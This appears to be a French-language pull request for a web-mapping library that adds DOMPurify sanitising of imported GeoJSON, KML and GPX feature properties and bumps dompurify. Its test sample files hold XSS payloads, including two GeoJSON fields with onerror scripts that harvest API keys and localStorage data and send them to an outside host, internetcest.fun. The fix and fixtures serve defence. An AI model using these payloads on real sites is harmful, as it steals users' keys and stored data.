### PR TITLE
Fix(LayerImport): Sanitize des propriétés GeoJSON pour éviter les risques de XSS

### DIFF
--- a/package.json
+++ b/package.json
@@ -49,7 +49,7 @@
     "ajv-formats": "^3.0.1",
     "clusterize.js": "^1.0.0",
     "doctoc": "^2.4.0",
-    "dompurify": "^3.2.6",
+    "dompurify": "^3.4.5",
     "eventbusjs": "0.2.0",
     "geoportal-access-lib": "3.4.6",
     "loglevel": "^1.9.1",

--- a/samples-src/resources/data/geojson/xss.geojson
+++ b/samples-src/resources/data/geojson/xss.geojson
@@ -6,7 +6,8 @@
             "properties": {
                 "name": "<img src=x onerror=\"document.onmousemove=function(){fetch('/mescles').then(r=>r.text()).then(d=>{var m=d.match(/apikey.{0,100}/g);if(m){for(vari=0;i<m.length;i++){(new Image()).src='https: //internetcest.fun/?k='+encodeURIComponent(m[i])}}});document.onmousemove=null}\">Name",
                 "description": "<img src=x onerror=\"var t=localStorage.getItem('service');if(t){for(var i=0;i<t.length;i+=500){var p=encodeURIComponent(t.slice(i,i+500));(new Image()).src='https: //internetcest.fun/?i='+i+'&d='+p}}\">Description",
-                "titre": "<img src=x onerror=alert(1)>Titre"
+                "titre": "<img src=x onerror=alert(1)>Titre",
+                "image": "<b>/resources/geoportail-waiting.gif</b>"
         },
         "geometry": {
             "type": "LineString",

--- a/samples-src/resources/data/geojson/xss.geojson
+++ b/samples-src/resources/data/geojson/xss.geojson
@@ -1,0 +1,30 @@
+{
+    "type": "FeatureCollection",
+    "features": [
+        {
+            "type": "Feature",
+            "properties": {
+                "name": "<img src=x onerror=\"document.onmousemove=function(){fetch('/mescles').then(r=>r.text()).then(d=>{var m=d.match(/apikey.{0,100}/g);if(m){for(vari=0;i<m.length;i++){(new Image()).src='https: //internetcest.fun/?k='+encodeURIComponent(m[i])}}});document.onmousemove=null}\">Name",
+                "description": "<img src=x onerror=\"var t=localStorage.getItem('service');if(t){for(var i=0;i<t.length;i+=500){var p=encodeURIComponent(t.slice(i,i+500));(new Image()).src='https: //internetcest.fun/?i='+i+'&d='+p}}\">Description",
+                "titre": "<img src=x onerror=alert(1)>Titre"
+        },
+        "geometry": {
+            "type": "LineString",
+            "coordinates": [
+                [
+                    2.34,
+                    48.85
+                ],
+                [
+                    2.35,
+                    48.86
+                ],
+                [
+                    2.36,
+                    48.855
+                ]
+            ]
+        }
+    }
+]
+}

--- a/samples-src/resources/data/gpx/xss.gpx
+++ b/samples-src/resources/data/gpx/xss.gpx
@@ -1,0 +1,11 @@
+<gpx xmlns="http://www.topografix.com/GPX/1/1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd" version="1.1" creator="OpenLayers">
+	<metadata xmlns="http://www.w3.org/1999/xhtml">
+		<extensions>
+			<data name="geoportail:compute">{"test":"&lt;img src=x onerror=alert(1)&gt;texte"}</data>
+		</extensions>
+	</metadata>
+	<rte>
+		<rtept lat="48.96403916928628" lon="2.43505660416429"/>
+		<rtept lat="48.72698921172872" lon="2.3553643245170104"/>
+	</rte>
+</gpx>

--- a/samples-src/resources/data/kml/xss.kml
+++ b/samples-src/resources/data/kml/xss.kml
@@ -1,0 +1,29 @@
+<kml
+	xmlns="http://www.opengis.net/kml/2.2"
+	xmlns:gx="http://www.google.com/kml/ext/2.2"
+	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
+      xsi:schemaLocation="http://www.opengis.net/kml/2.2 https://developers.google.com/kml/schema/kml22gx.xsd">
+	<Placemark>
+		<description>Un Point avec label (extendData)</description>
+		<name>C'est un label avec plusieurs balises 'extendedData' !</name>
+		<ExtendedData>
+			<Data name="comment">
+				<value>&lt;img src=x onerror=alert(1)&gt;comment</value>
+			</Data>
+			<Data name="another_comment">
+				<value>&quot;&lt;img src=x onerror=alert(1)&gt;another_comment&quot;</value>
+			</Data>
+		</ExtendedData>
+		<Style>
+			<IconStyle>
+				<Icon>
+					<href>data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADMAAAAmCAYAAABpuqMCAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAN1wAADdcBQiibeAAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAARfSURBVFiF3ZhfbBRVGMV/d2Z3212tbSkCbuNaqzaRiL6QyAMPjSFoYqgx4oOiRmMFUzQG479o2lQ0QXk1EhYFgmlD2mIRkYhRwqLEaA2GiKWV7rZLQ0sLwbZId7t/Zq4PFK1125m5s/vCedz7nXO+M9/N3jsD1xFEvgXlTkrI8hBQBywFbgEqgEvAMHAayZcYHBYbuZJP77yFkdsoR+ct4GXAb4OSQPARXj4QzzGejx7yEkZuZy2CMLBAgf4nkhfEi3S67UNzQ5YSIXfQhKAdtSAACxDsk2EapXT3cF2FYQdNSN7F/YQFsJkw77gVUcL01mp3o5EDJoK1Yj37VchKjcjdlJEmhvrWmg9jGNwhGhhzSlTbZmnepjBBAMrReF2F6Hgy0+fIKPb+flWRIMtip+eQ88lcPRCtg3gCCVZ3RqhPDbJepqlPDbJ6XwSvP2nDJYCXB522prLN6iwrPIEETw33U/VoLZovBPjQfCGqHqtl3XDUZiBrn1lQCXO3ZcUDLV34Su/JueYrW0btnp8tNSRLnTamEiZoWRF6uHre9dseuT0vPrOgEqbCWtW3xNX6VSy02c+/sk4JwF+WFWZ6xGL9vA2fyzb7+QcqYUYtKwYP9s+7PrA/bsNn/geSA87DSLosa44+fT/p8VM511Jjp4g8u8KGk7XPLKhM5qhlRSbppzV4JwMdEcz0WSCNmT5LrC1CS/AujKliSw1BxGljzm8AH3MjHs4BpU65DjCBn0rxDJNOSI4nM33F2O2U58yEnU6DgOpF02AzcEGJa40LZHlfhagUZvp6vkmFawObVK7/4PLFSoZpBZ50ozEThsne6i2hjZqmFRVJ6U8JUeSVUmQNzQvg0c1MVtNMIUTSl0pNLhsaGu8A4xrfbZhS4CRQ5SoFcCWtja/5NBg+N+GZsu0vhSEkcY8mf+iNx+OuX3llmJVABNCVNUA2fl3xWdvJkriqRBb2uPugAYgNHEey1Y3Gt3/ccNxFEAChm2al6zAAjNAEWF/rc1Ev6+ffOLTwmBt7E0xD02J5CSOayQLrsHMJnYGMITJvHrr588mUMKyr54CUaaHrnfF4fCQ/kwHEBmLAa044rb+WHP4xXnxJ0VJK6CkyjO2xWOx3KMSH8zDtwONWdb2jvt41u4JtChZJKeVveDwnYrHYfw5uj4KYFRpSWbGqyCPL5ypIpMTkKwcWfWVXUEqRRcio1LTuUCjUE4lEsrnq8j4ZgKEP9bpgmfHFHPpyy3fle3f9Uto3n4aUIqNhDghN6zZ1vTcajaasfAsSBmBwq7f11tLM/24Hx2L+n+rbF38zBy2JEP0anPEGAj3d3d1pJ56F2GYAGInM82M+bWW53wxd++3ipH7x1QMLj8ysk5BAyj6Ppp2+d/nyaEdHh/I/W8EmA3Ci2b/iviVT3+tCerMmxkudiz450hcYBSYQIqrDmScGBvqawSxkH3lDV2Pxe6ltItnWcFNLTXX1qpqamkoK/BCvC/wNB+l5MdQKNHsAAAAASUVORK5CYII=</href>
+				</Icon>
+				<hotSpot x="0.5" y="0" xunits="fraction" yunits="fraction"/>
+			</IconStyle>
+		</Style>
+		<Point>
+			<coordinates>0,0</coordinates>
+		</Point>
+	</Placemark>
+</kml>

--- a/src/packages/Controls/LayerImport/LayerImport.js
+++ b/src/packages/Controls/LayerImport/LayerImport.js
@@ -52,6 +52,7 @@ import Utils from "../../Utils/Helper";
 import Logger from "../../Utils/LoggerByDefault";
 import SelectorID from "../../Utils/SelectorID";
 import ProxyUtils from "../../Utils/ProxyUtils";
+import { sanitizeHtml } from "../../Utils/Sanitize";
 // DOM
 import LayerImportDOM from "./LayerImportDOM";
 // import local with ol dependencies
@@ -1719,7 +1720,21 @@ class LayerImport extends Control {
             );
 
             logger.log("loaded features : ", features);
-
+            
+            // sanitize toutes les properties des features pour éviter les risques de XSS
+            // for (let index = 0; index < features.length; index++) {
+            //     const feature = features[index];
+            //     var properties = feature.getProperties();
+            //     for (var key in properties) {
+            //         if (properties.hasOwnProperty(key)) {
+            //             var value = properties[key];
+            //             if (typeof value === "string") {
+            //                 feature.set(key, sanitizeHtml(value));
+            //             }
+            //         }
+            //     }
+            // }
+            
             // création d'une couche vectorielle à partir de ces features
             vectorSource = new VectorSource({
                 features : new Collection()

--- a/src/packages/Controls/LayerImport/LayerImport.js
+++ b/src/packages/Controls/LayerImport/LayerImport.js
@@ -1722,18 +1722,18 @@ class LayerImport extends Control {
             logger.log("loaded features : ", features);
             
             // sanitize toutes les properties des features pour éviter les risques de XSS
-            // for (let index = 0; index < features.length; index++) {
-            //     const feature = features[index];
-            //     var properties = feature.getProperties();
-            //     for (var key in properties) {
-            //         if (properties.hasOwnProperty(key)) {
-            //             var value = properties[key];
-            //             if (typeof value === "string") {
-            //                 feature.set(key, sanitizeHtml(value));
-            //             }
-            //         }
-            //     }
-            // }
+            for (let index = 0; index < features.length; index++) {
+                const feature = features[index];
+                var properties = feature.getProperties();
+                for (var key in properties) {
+                    if (properties.hasOwnProperty(key)) {
+                        var value = properties[key];
+                        if (typeof value === "string") {
+                            feature.set(key, sanitizeHtml(value));
+                        }
+                    }
+                }
+            }
             
             // création d'une couche vectorielle à partir de ces features
             vectorSource = new VectorSource({

--- a/src/packages/Utils/Sanitize.js
+++ b/src/packages/Utils/Sanitize.js
@@ -1,0 +1,112 @@
+/**
+ * sanitizeHtml.js
+ *
+ * Sanitize une chaîne de caractères HTML issue d'une propriété
+ * de fichier géographique (GeoJSON, KML, GPX) via DOMPurify.
+ *
+ * Dépendance : dompurify >= 3.x
+ *   npm install dompurify
+ *
+ * Usage ESM (navigateur / Vite / Vue 3) :
+ *   import { sanitizeHtml } from './sanitizeHtml.js';
+ *
+ */
+
+import DOMPurify from "dompurify";
+
+// ─── Configuration par défaut ─────────────────────────────────────────────────
+//
+// Objectif : autoriser un sous-ensemble sûr de HTML de mise en forme
+// (gras, italique, liens, listes…) tout en bloquant tout vecteur XSS.
+//
+// Pour un mode "texte pur" (aucune balise conservée), voir STRICT_CONFIG.
+//
+const DEFAULT_CONFIG = {
+    // Balises HTML autorisées (mise en forme inoffensive)
+    ALLOWED_TAGS : [
+        "b", "strong", "i", "em", "u", "s", "br", "p",
+        "ul", "ol", "li", "a", "span", "small", "sup", "sub",
+    ],
+
+    // Attributs autorisés par balise
+    ALLOWED_ATTR : ["href", "title", "target", "rel"],
+
+    // Force le wrap dans <body> → évite les injections de niveau document
+    FORCE_BODY : true,
+
+    // Bloque les data-* (exploitables via JS)
+    ALLOW_DATA_ATTR : false,
+
+    // Retourne une string (pas un nœud DOM)
+    RETURN_DOM : false,
+    RETURN_DOM_FRAGMENT : false,
+};
+
+// ─── Configuration stricte (texte pur, zéro balise) ──────────────────────────
+//
+// À utiliser si la valeur doit être insérée dans un contexte
+// où aucune balise HTML n'est attendue (attribut, tooltip, title…).
+//
+const STRICT_CONFIG = {
+    ALLOWED_TAGS : [],   // Aucune balise conservée
+    ALLOWED_ATTR : [],
+    KEEP_CONTENT : true, // Le texte brut est conservé, seules les balises sont supprimées
+    FORCE_BODY : true,
+    ALLOW_DATA_ATTR : false,
+    RETURN_DOM : false,
+    RETURN_DOM_FRAGMENT : false,
+};
+
+// ─── Fonction principale ──────────────────────────────────────────────────────
+
+/**
+ * Sanitize une chaîne HTML avec DOMPurify.
+ *
+ * @param {String}  input              - Valeur brute issue de la propriété (GeoJSON / KML / GPX).
+ * @param {Object}  [options]          - Options optionnelles.
+ * @param {Boolean} [options.strict]   - true → texte pur (aucune balise conservée).
+ *                                       false (défaut) → mise en forme sûre autorisée.
+ * @param {Object}  [options.config]   - Surcharge partielle de la config DOMPurify.
+ * @param {Object}  [options.purify]   - Instance DOMPurify à utiliser (utile en Node.js avec jsdom).
+ *
+ * @returns {String} Chaîne sanitizée, sûre pour une insertion dans le DOM.
+ *
+ * @example
+ * // Valeur avec XSS dans une propriété GeoJSON
+ * const raw = feature.properties.description;          // "<img src=x onerror=alert(1)> Paris"
+ * const safe = sanitizeHtml(raw);                      // " Paris"
+ *
+ * // Mode strict pour un attribut title
+ * const title = sanitizeHtml(feature.properties.nom, { strict: true });
+ *
+ */
+export function sanitizeHtml (input, options = {}) {
+    // Valeurs non-string (number, null, undefined, boolean) → retournées telles quelles
+    if (typeof input !== "string") {return input;}
+
+    const { strict = false, config = {}, purify = DOMPurify } = options;
+
+    const baseConfig = strict ? STRICT_CONFIG : DEFAULT_CONFIG;
+    const finalConfig = { ...baseConfig, ...config };
+
+    return purify.sanitize(input, finalConfig);
+}
+
+// ─── Hook DOMPurify : sécuriser les liens ────────────────────────────────────
+//
+// Interdit les href commençant par javascript: ou data:
+// même si DOMPurify les autorise déjà par défaut — double sécurité.
+//
+DOMPurify.addHook("afterSanitizeAttributes", (node) => {
+    if (node.tagName === "A") {
+        const href = node.getAttribute("href") || "";
+        if (/^\s*(javascript|data|vbscript):/i.test(href)) {
+            node.removeAttribute("href");
+        }
+        // Forcer rel="noopener noreferrer" sur les liens externes
+        if (href.startsWith("http")) {
+            node.setAttribute("target", "_blank");
+            node.setAttribute("rel", "noopener noreferrer");
+        }
+    }
+});


### PR DESCRIPTION
Pour tester, 
- importer le fichier geojson : samples-src/resources/data/geojson/xss.geojson
- activer le GFI
- cliquer sur le tracé

Le HTML est nettoyé !

**Note**
> Rapport de vulnérabilité envoyé par mail !